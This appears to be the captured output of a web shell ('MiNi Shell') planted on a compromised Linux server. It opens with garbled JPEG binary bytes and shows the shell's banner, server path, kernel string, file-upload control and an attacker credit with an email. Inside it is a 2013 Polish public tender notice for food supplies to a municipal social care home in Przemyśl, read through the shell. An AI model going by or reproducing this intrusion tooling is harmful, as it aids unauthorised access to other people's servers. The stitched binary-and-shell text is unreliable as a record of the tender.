JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20131210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20131210/510388-N-2013.html

<p class="kh_header"><b>Przemyśl: Dostawy artykułów spożywczych do Miejskiego Domu Pomocy Społecznej 
w Przemyślu</b><br>
<b>Numer ogłoszenia: 510388 - 2013; data zamieszczenia: 10.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Dom Pomocy Społecznej , Ul. Gen. J. Wysockiego 99, 37-700 Przemyśl, woj. podkarpackie, tel. 16 670 55 57, faks 16 670 55 57.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mdps.przemysl.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych do Miejskiego Domu Pomocy Społecznej 
w Przemyślu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I.	Różne artykuły spożywcze - 18 220 kg
II.	 Warzywa i owoce - 63 615 kg
III.	 Ryby konserwowe i mrożone - 2036 kg
IV.	 Mięso i wędliny - 16 000 kg
V.	 Pieczywo - 25 200 kg.
VI.	 Warzywa i owoce mrożone - 5190 kg
VII.	 Jaja - 36 000 szt.
VIII.	 Nabiał - 23 670 kg.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.	Część I - Dostawa różnych artykułów spożywczych do Miejskiego Domu Pomocy Społecznej w Przemyślu - 10% 
2.	Część II - Dostawa warzyw i owoców do Miejskiego Domu Pomocy Społecznej w Przemyślu - 10%
3.	Część III - Dostawa ryb konserwowych i ryb mrożonych do Miejskiego Domu Pomocy Społecznej w Przemyślu - 10%
4.	Część IV - Dostawa mięs i wędlin do Miejskiego Domu Pomocy Społecznej 
w Przemyślu - 10%
5.	Cześć V - Dostawa pieczywa do Miejskiego Domu Pomocy Społecznej 
w Przemyślu - 10%
6.	Część VI - Dostaw warzy i owoców mrożonych do Miejskiego Domu Pomocy Społecznej w Przemyślu - 10%Społecznej 
w Przemyślu - 10%
8.	Część VIII - Dostawa nabiału do Miejskiego Domu Pomocy Społecznej 
w Przemyślu - 10%</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> brak</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. wypełniony formularz ofert wg załącznika nr 1 do SIWZ
2. kosztorys ofertowy
3. wypełniony formularz o zakresie prac wykonanych przez podwykonawców (jeżeli dotyczy)
4. pełnomocnictwo (jeżeli dotyczy)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>. urzędowa zmiana stawki podatku VAT - w celu dostosowania do aktualnie 
	obowiązującej stawki - bez zmiany wartości netto produktów objętych zmianą 
	jednak nie wcześniej niż po dacie rozpoczęcia jej obowiązywania. Zmiana umowy 
    w tym zakresie może być wprowadzona tylko na wniosek Wykonawcy. Jednocześnie 
	Wykonawca zobowiązuje się do przedstawienia Zamawiającemu podstawy prawnej 
	do podwyższenia lub obniżenia cen towarów np. rozporządzenie, obwieszczenie, 
	ustawa lub innej podstawy do zmiany cen - zmiany umowy. 
b. w przypadku zmiany powyżej 3% kwartalnego wskaźnika cen towarów i usług 
	podawanego przez GUS, publikowanego w Monitorze Polskim, - o wielkość tegoż 
	wskaźnika, jednak nie wcześniej niż po jego ogłoszeniu. Zmiana umowy w tym 
	zakresie może być wprowadzona tylko na wniosek Wykonawcy. Jednocześnie 
	Wykonawca zobowiązuje się do przedstawienia Zamawiającemu podstawy do 
	podwyższenia lub obniżenia cen towarów np. rozporządzenie, obwieszczenie, 
	ustawa lub innej podstawy prawnej do zmiany cen. 
c. w przypadku zmian przepisów ogólnie obowiązujących, które miałyby wpływ na 
	treść umowy. 
d. w przypadku obniżenia cen producenta lub zastosowania promocyjnej obniżki cen, 
	Zamawiający zastrzega sobie prawo zakupu asortymentu objętego umową po 
	cenach odpowiednio obniżonych. 
e. w przypadku podwyższenia jakości parametrów lub innych cech 
	charakterystycznych dla przedmiotu dostawy, w tym zmiana numeru katalogowego 
	produktu lub nazwy własnej produktu pod warunkiem wprowadzenia na rynek 
	produktu o wyższej jakości, lepszych parametrach lub innych korzystniejszych 
	cechach charakterystycznych, przy zachowaniu ceny ofertowej dla danego 
	produktu, na podstawie pisemnego wniosku Wykonawcy, pod warunkiem 
	uzyskania zgody przez Zamawiającego. 
f. w przypadku zmiany sposobu konfekcjonowania towarów objętych umową, 
	 w przypadku zmiany wielkości opakowania wprowadzonej przez producenta 
      z zachowaniem zasady proporcjonalności w stosunku do ceny objętej umową, pod 
	 warunkiem uzyskania zgody przez Zamawiającego. 
g. w przypadku wstrzymania lub zakończenia produkcji towarów będących 
	przedmiotem dostawy, możliwość dostarczania odpowiedników towarów objętych 
	umową, o parametrach nie gorszych niż towary objęte ofertą, przy zachowaniu 
	ceny ofertowej dla danego towaru na podstawie pisemnego wniosku Wykonawcy, 
	pod warunkiem uzyskania zgody przez Zamawiającego. 
h. Zmiany umowy wymagają formy pisemnej pod rygorem nieważności i będą 
	dopuszczalne w granicach normowania Ustawy z dnia 29 stycznia 2004r. Prawo 
	zamówień publicznych ( t.j. z 2007 r. Dz. U. Nr 223, poz. 1655 z późn. zm.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mdps.przemysl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Dom Pomocy Społecznej w Przemyślu
ul. Gen. J. Wysockiego 99,  37-700 Przemyśl,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2013 godzina 08:45, miejsce: Miejski Dom Pomocy Społecznej w Przemyślu
ul. Gen. J. Wysockiego 99,  37-700 Przemyśl,
budynek Administracji - pokój Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Różne artykuły Spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Budyń bez cukru	szt.	1680
Chrzan 0,26 - 0,40kg	kg	110
Ciastka bezcukrowe - Herbatniki 73g	szt.	500
Ciastka bezcukrowe - wafelki z nadzieniem 110g	szt.	500
Ciastka biszkoptowe 1kg	kg	265
Ciastka wafle nadziewane 1kg	kg	74
Cukier 1kg	kg	5400
Dżem niskosłodzony 0,27 - 0,9 	kg	500
Dżem wysokosłodzony 0,27 - 0,9	kg	500
Groszek konserwowy 0,40 - 0,50kg	kg	130
Herbata 0,10	kg	250
Kakao typu holenderskiego 0,10	kg	25
Kasza gryczana	kg	540
Kasza jęczmienna	kg	200
Kasza manna	kg	550
Kawa zbożowa rozpuszczalna typu Inka 015	kg	55
Ketchup 500ml łagodny	szt.	400
Kisiel bez cukru 0,04	kg	56
Koncentrat pomidorowy 30% 0,2 - 0,9	kg	350
Krem czekoladowy 0,2 - 0,4	kg	100
Kukurydza konserwowa 0.40 	kg	50
Kwasek cytrynowy 0.02kg	szt.	420
Majonez 0.60 - 0.80kg	kg	155
Makaron domowy 1 - 3kg	kg	1000
Makaron nitka jajeczny 0.50 - 1 kg	kg	300
Margaryna mleczna	kg	360
Margaryna śniadaniowa 0.50kg	kg	935
Marmolada wieloowocowa 1 -1.5kg	kg	730
Mąka pszenna typ 500%	kg	1300
Mąka ziemniaczana	kg	70
Musztarda do 0.5kg	kg	128
Ocet	l	64
Ogórek kiszony 0.9L	kg	290
Ogórek konserwowy 0.9L	kg	140
Olej rzepakowy, sojowy	l	650
Pieczarka marynowana 0.9L	kg	86
Płatki owsiane	kg	390
Powidło śliwkowe do 0.9kg	kg	250
Ryż 1kg	kg	1500
Seler marynowany 0.9L	kg	150
Żurek słoik 0.35 - 0.4kg	kg	240
Żelatyna 20 - 50g	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Buraki	kg	3000
Banany	kg	1000
Cebula	kg	1200
Cebulka zielona - pęczek	szt.	520
Cytryna	kg	654
Czosnek	kg	9
Fasola typu Jaś Piękny - sucha 	kg	280
Jabłka deserowe	kg	4580
Jabłka kompotowe	kg	940
Kapusta biała	kg	1900
Kapusta czerwona	kg	70
Kapusta kiszona	kg	348
Kapusta pekińska	kg	560
Mandarynka	kg	320
Marchew	kg	4570
Ogórek świeży	kg	400
Pieczarka - świeża	kg	146
Pietruszka korzeń	kg	760
Pietruszka natka - pęczek	szt.	420
Pomarańcze	kg	700
Pomidory	kg	1770
Por	kg	200
Rzodkiewka - pęczek	szt.	570
Sałata zielona	szt.	800
Seler korzeń	kg	590
Szczypior - pęczek	szt.	130
Ziemniaki	kg	37 000
Koper zielony pęczek	szt.	680
Kalafior świeży oczyszczony	kg	430
Arbuz	kg	440
Brzoskwinia	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.20.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ryby konserwowe i mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filet Dorsz mrożony	kg	900
Panga filet mrożony	kg	348
Konserwa, filet makreli 
w pomidorach 170g	szt.	1400
Konserwa, filet z Makreli w oleju 170g	szt.	1360
Makrela wędzona	kg	136
Konserwa sałatka z makreli  330g	szt.	120
Konserwa Tuńczyk w kawałkach w oleju 170g	szt.	360
Konserwa Szprot w pomidorach 324g	szt.	300
Filet śledziowy marynowany	kg	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Antrykot - świeży	kg	500
Baleron gotowany	kg	240
Boczek gotowany	kg	60
Filet z indyka bez kości bez skóry	kg	460
Filet z kurczaka bez kości bez skóry	kg	600
Flaki wołowe mrożone krojone	kg	130
Karczek bez kości	kg	180
Kiełbasa krakowska parzona	kg	90
Kiełbasa mortadela	kg	250
Kiełbasa parówkowa z szynki	kg	560
Kiełbasa szynkowa z indyka 	kg	600
Kiełbasa wiejska 	kg	30
Kiełbasa zwyczajna 	kg	460
Kiszka (krupniok) w jelicie cienkim	kg	180
Konserwa pasztet z drobiu smakowe 130g	szt.	1200
Kości wieprzowe od schabu  /pokrzep	kg	1300
Kurczak świeży	kg	1200
Lencz	kg	240
Łopatka wieprzowa bez kości	kg	600
Mięso udowe z indyka bez kości bez skóry 	kg	760
Noga z kurczaka świeża	kg	1580
Parówki drobiowe 	kg	700
Pasztet pieczony 	kg	194
Pasztetowa kremowa	kg	100
Polędwica sopocka WP	kg	400
Porcja rosołowa	kg	300
Salceson drobiowy	kg	270
Kiełbasa Żywiecka	kg	300
Schab bez kości	kg	700
Słonina	kg	14
Smalec	kg	80
Szynka drobiowa 	kg	540
Szynka pieczona wieprzowa	kg	350
Szynka wiejska gotowana wieprzowa	kg	450
Szynka wieprzowa gotowana	kg	210
Wątroba z drobiu	kg	100
Żeberka paski	kg	200
Noga z kruczka mrożona	kg	200
Kurczak mrożony	kg	200
Konserwa pasztet drobiowy 300g	szt.	150
Mięso szynka WP bez kości	kg	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bina 500g	szt.	7800
Bułka tarta 1000g	Kg	120
Bułka zwykła 100g	szt.	2600
Chleb razowy 500g	szt.	9000
Chleb wiejski 1000g	szt.	15 700
Drożdżówka z kruszonką 70g	szt.	3000
Drożdżówka z nadzieniem 90g	szt.	4200
Rogal 80g	szt.	400
Chałka 500g	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Warzywa i owoce mrożone.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuły mrożone 2.5kg	kg	330
Fasola szparagowa mrożona 2.5kg	kg	300
Jarzynka mrożona 2.5kg	kg	2000
Kalafior mrożony 2.5kg	kg	220
Marchew mrożona 2.5kg	kg	340
Mieszanka kompotowa 2.5kg	kg	2000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jajo świeże średnie	szt.	36 000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Nabiał.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jogurt naturalny 200g	szt.	7000
Jogurt owocowy 125g o zawartości 1.5% tłuszczu	szt.	6000
Kefir 400g	szt.	2000
Masło zawartość tłuszczu 82%	kg	1600
Mleko folia 2% tłuszczu	l	12 600
Mleko w proszku 0.5kg 26% tłuszczu	kg	200
Ser topiony 27% tłuszczu kremowy różne smaki	kg	250
Ser twarogowy chudy krajanka	kg	1500
Ser twarogowy półtłusty krajanka	kg	700
Ser żółty 45% tłuszczu typu edamski nie gorszy	kg	500
Serek owocowy 125g -150g	szt.	5 000
Serek wiejski ziarnisty 200g	szt.	1600
Śmietana 18% tłuszczu do 1L	l	2300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com